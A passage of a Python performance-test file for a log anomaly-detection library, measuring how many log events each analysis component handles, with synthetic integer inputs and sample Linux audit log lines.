PathExistsMatchRule from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector from aminer.analysis.ParserCount import ParserCount from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector from aminer.analysis.MatchFilter import MatchFilter from aminer.analysis.VariableTypeDetector import VariableTypeDetector from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from unit.TestBase import TestBase import time import random from time import process_time from _io import StringIO import timeit import pickle class AnalysisComponentsPerformanceTest(TestBase): """These unittests test the performance of all analysis components.""" result_string = 'The %s could in average handle %d LogAtoms %s with %s\n' result = '' iterations = 2 waiting_time = 1 integerd = 'integer/d' different_paths = '%d different path(s).' different_attributes = '%d different attribute(s).' @classmethod def tearDownClass(cls): """Run the TestBase tearDownClass method and print the results.""" super(AnalysisComponentsPerformanceTest, cls).tearDownClass() print('\nwaiting time: %d seconds' % cls.waiting_time) print(cls.result) def setUp(self): """Set up needed variables.""" TestBase.setUp(self) self.output_stream = StringIO() self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream) def run_atom_filters_match_path_filter(self, number_of_paths): """Run the performance tests for AtomFilters.MatchPathFilter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) subhandler_filter = SubhandlerFilter([], stop_when_handled_flag=True) i = 0 while i < number_of_paths: match_path_filter = MatchPathFilter([(self.integerd + str(i), new_match_path_detector)], None) subhandler_filter.add_handler(match_path_filter, stop_when_handled_flag=True) i = i + 1 t = round(time.time(), 3) # worst case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_path_filter) worst_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000) # best case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_path_filter) best_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000) results[z] = int((worst_case + best_case) / 2) z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = int(avg / self.iterations) type(self).result = self.result + self.result_string % ( subhandler_filter.__class__.__name__, avg, results, '%d different %ss with a %s.' % ( number_of_paths, match_path_filter.__class__.__name__, new_match_path_detector.__class__.__name__)) def run_atom_filters_match_value_filter(self, number_of_paths): """Run the performance tests for AtomFilters.MatchValueFilter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) subhandler_filter = SubhandlerFilter([], stop_when_handled_flag=True) i = 0 dictionary = {} while i < 1000000: dictionary[i] = new_match_path_detector i = i + 1 i = 0 while i < number_of_paths: match_value_filter = MatchValueFilter(self.integerd + str(i % number_of_paths), dictionary, None) subhandler_filter.add_handler(match_value_filter, stop_when_handled_flag=True) i = i + 1 t = round(time.time(), 3) # worst case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_value_filter) worst_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000) # best case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_value_filter) best_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000) results[z] = int((worst_case + best_case) / 2) z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = int(avg / self.iterations) type(self).result = self.result + self.result_string % ( subhandler_filter.__class__.__name__, avg, results, '%d different %ss with a dictionary of %ss.' % ( number_of_paths, match_value_filter.__class__.__name__, new_match_path_detector.__class__.__name__)) def run_new_match_path_detector(self, number_of_paths): """Run the performance tests for NewMatchPathDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) t = round(time.time(), 3) measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_detector) measured_time += timeit.timeit(lambda: new_match_path_detector.receive_atom(log_atom), number=1) i += 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_path_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths) def run_enhanced_new_match_path_value_combo_detector(self, number_of_paths): """Run the performance tests for EnhancedNewMatchPathValueComboDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector( self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, True) t = round(time.time(), 3) # worst case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, enhanced_new_match_path_value_combo_detector) worst_case = self.waiting_time / ( timeit.timeit(lambda: enhanced_new_match_path_value_combo_detector.receive_atom(log_atom), number=10000) / 10000) # best case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, enhanced_new_match_path_value_combo_detector) best_case = self.waiting_time / ( timeit.timeit(lambda: enhanced_new_match_path_value_combo_detector.receive_atom(log_atom), number=10000) / 10000) results[z] = int((worst_case + best_case) / 2) z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( enhanced_new_match_path_value_combo_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths) def run_histogram_analysis(self, number_of_paths, amplifier): """Run the performance tests for HistogramAnalysis.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 86400 / number_of_paths, 0, 1, number_of_paths, False) histogram_data = HistogramData('match/crontab', modulo_time_bin_definition) histogram_analysis = HistogramAnalysis( self.aminer_config, [(histogram_data.property_path, modulo_time_bin_definition)], amplifier * self.waiting_time, [self.stream_printer_event_handler], False, 'Default') i = 0 measured_time = 0 t = time.time() while measured_time < self.waiting_time / 10: rand = random.randint(0, 100000) match_element = MatchElement('match/crontab', str(t + rand).encode(), t + rand, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + i, histogram_analysis) measured_time += timeit.timeit(lambda: histogram_analysis.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( histogram_analysis.__class__.__name__, avg, results, '%d bin(s) and output after %d elements.' % ( number_of_paths, amplifier * self.waiting_time)) def run_match_value_average_change_detector(self, number_of_paths): """Run the performance tests for MatchValueAverageChangeDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 t = time.time() match_value_average_change_detector = MatchValueAverageChangeDetector(self.aminer_config, [ self.stream_printer_event_handler], None, path_list, 2, t, False, 'Default') i = 0 while i < number_of_paths: match_element = MatchElement(self.integerd + str(i), b'%d' % t, t, None) log_atom = LogAtom( match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 0.1), t + 0.1, None) log_atom = LogAtom( match_element.get_match_object(), ParserMatch(match_element), t + 0.1, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 0.2), t + 0.2, None) log_atom = LogAtom( match_element.get_match_object(), ParserMatch(match_element), t + 0.2, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 10), t + 10, None) log_atom = LogAtom( match_element.get_match_object(), ParserMatch(match_element), t + 10, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) i = i + 1 t = time.time() # worst case match_element = MatchElement(self.integerd + str(number_of_paths - 1), b'%d' % t, t, None) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector) worst_case = self.waiting_time / ( timeit.timeit(lambda: match_value_average_change_detector.receive_atom(log_atom), number=10000) / 10000) # best case match_element = MatchElement(self.integerd + str(0), b'%d' % t, t, None) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector) best_case = self.waiting_time / ( timeit.timeit(lambda: match_value_average_change_detector.receive_atom(log_atom), number=10000) / 10000) results[z] = int((worst_case + best_case) / 2) z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( match_value_average_change_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths) def run_match_value_stream_writer(self, number_of_paths): """Run the performance tests for MatchValueStreamWriter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] parsing_model = [] while i < number_of_paths / 2: path_list.append('match/integer/d' + str(i % number_of_paths)) path_list.append('match/integer/s' + str(i % number_of_paths)) parsing_model.append( DecimalIntegerValueModelElement('d' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)) parsing_model.append(FixedDataModelElement('s' + str(i % number_of_paths), b' Euro ')) i = i + 1 sequence_model_element = SequenceModelElement('integer', parsing_model) match_value_stream_writer = MatchValueStreamWriter(self.output_stream, path_list, b';', b'-') t = time.time() data = b'' for j in range(1, int(number_of_paths / 2) + number_of_paths % 2 + 1): data = data + str(j).encode() + b' Euro ' match_context = MatchContext(data) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, match_value_stream_writer) results[z] = int(self.waiting_time / ( timeit.timeit(lambda: match_value_stream_writer.receive_atom(log_atom), number=10000) / 10000)) z = z + 1 avg = avg + results[z - 1] avg = avg / self.iterations type(self).result = self.result + self.result_string % ( match_value_stream_writer.__class__.__name__, avg, results, self.different_paths % number_of_paths) def run_missing_match_path_value_detector(self, number_of_paths): """Run the performance tests for MissingMatchPathValueDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 missing_match_path_list_value_detector = MissingMatchPathListValueDetector( self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, 3600, 86400) t = time.time() # worst case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(number_of_paths - 1), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(1).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, missing_match_path_list_value_detector) worst_case = self.waiting_time / ( timeit.timeit(lambda: missing_match_path_list_value_detector.receive_atom(log_atom), number=10000) / 10000) # best case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(1).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, missing_match_path_list_value_detector) best_case = self.waiting_time / ( timeit.timeit(lambda: missing_match_path_list_value_detector.receive_atom(log_atom), number=10000) / 10000) results[z] = (worst_case + best_case) / 2 z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( missing_match_path_list_value_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths) def run_new_match_path_value_combo_detector(self, number_of_paths): """Run the performance tests for NewMatchPathValueComboDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 new_match_path_value_combo_detector = NewMatchPathValueComboDetector( self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, True) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_value_combo_detector) measured_time += timeit.timeit(lambda: new_match_path_value_combo_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_path_value_combo_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths) def run_new_match_path_value_detector(self, number_of_paths): """Run the performance tests for NewMatchValueDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, path_list, [ self.stream_printer_event_handler], 'Default', True, True) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_value_detector) measured_time += timeit.timeit(lambda: new_match_path_value_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_path_value_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths) def run_time_correlation_detector(self, number_of_rules): """Run the performance tests for TimeCorrelationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: time_correlation_detector = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], number_of_rules, 'Default', self.waiting_time * 9000, True, True, True, 1, 5) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, time_correlation_detector) measured_time += timeit.timeit(lambda: time_correlation_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( time_correlation_detector.__class__.__name__, avg, results, 'test_count=%d.' % number_of_rules) def run_time_correlation_violation_detector(self, chance): """Run the performance tests for TimeCorrelationViolationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: correlation_rule = CorrelationRule('Correlation', 0, chance, artefact_match_parameters=[('/integer/d0', '/integer/d1')]) a_class_selector = EventClassSelector('Selector1', [correlation_rule], None) b_class_selector = EventClassSelector('Selector2', None, [correlation_rule]) rules = [Rules.PathExistsMatchRule('/integer/d0', a_class_selector), Rules.PathExistsMatchRule('/integer/d1', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector( self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) s = time.time() measured_time = 0 i = 0 decimal_integer_value_me = DecimalIntegerValueModelElement( 'd0', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) while measured_time < self.waiting_time / 10: integer = '/integer' r = random.randint(1, 100) decimal_integer_value_me1 = DecimalIntegerValueModelElement( 'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me1.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s + r / 100, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) s = s + r / 100 if r / 100 >= chance: match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) i = i + 1 time_correlation_violation_detector.do_timer(s) i = i + 2 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( time_correlation_violation_detector.__class__.__name__, avg, results, '%d%% chance of not finding an element' % ((1 - chance) * 100)) def run_timestamp_correction_filters(self, number_of_paths): """Run the performance tests for TimestampCorrectionFilters.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([new_match_path_detector]) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, simple_monotonic_timestamp_adjust) measured_time += timeit.timeit(lambda: simple_monotonic_timestamp_adjust.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( simple_monotonic_timestamp_adjust.__class__.__name__, avg, results, 'a %s and %d different path(s).' % (new_match_path_detector.__class__.__name__, number_of_paths)) def run_timestamps_unsorted_detector(self, reset_factor): """Run the performance tests for TimestampsUnsortedDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: timestamps_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [ self.stream_printer_event_handler]) s = time.time() i = 0 measured_time = 0 mini = 100 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) r = random.randint(1, 100) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s + min(r, mini), timestamps_unsorted_detector) measured_time += timeit.timeit(lambda: timestamps_unsorted_detector.receive_atom(log_atom), number=1) if mini > r: mini = r else: mini = mini + reset_factor i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( timestamps_unsorted_detector.__class__.__name__, avg, results, 'a reset_factor of %f.' % reset_factor) def run_allowlist_violation_detector(self, number_of_paths, modulo_factor): """Run the performance tests for AllowlistViolationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 rules = [] while i < number_of_paths: rules.append(PathExistsMatchRule(self.integerd + str(i % number_of_paths), None)) i = i + 1 allowlist_violation_detector = AllowlistViolationDetector(self.aminer_config, rules, [self.stream_printer_event_handler]) t = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: r = random.randint(1, 100) if r >= modulo_factor: r = 2 else: r = 1 decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % (number_of_paths * r)), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, allowlist_violation_detector) measured_time += timeit.timeit(lambda: allowlist_violation_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( allowlist_violation_detector.__class__.__name__, avg, results, '%d different PathExistsMatchRules and a moduloFactor of %d.' % (number_of_paths, modulo_factor)) def run_new_match_id_value_combo_detector(self, min_allowed_time_diff): """Run the performance tests for NewMatchIdValueComboDetector.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00' b' nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 ' b'a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 ' b'tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)'] parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), 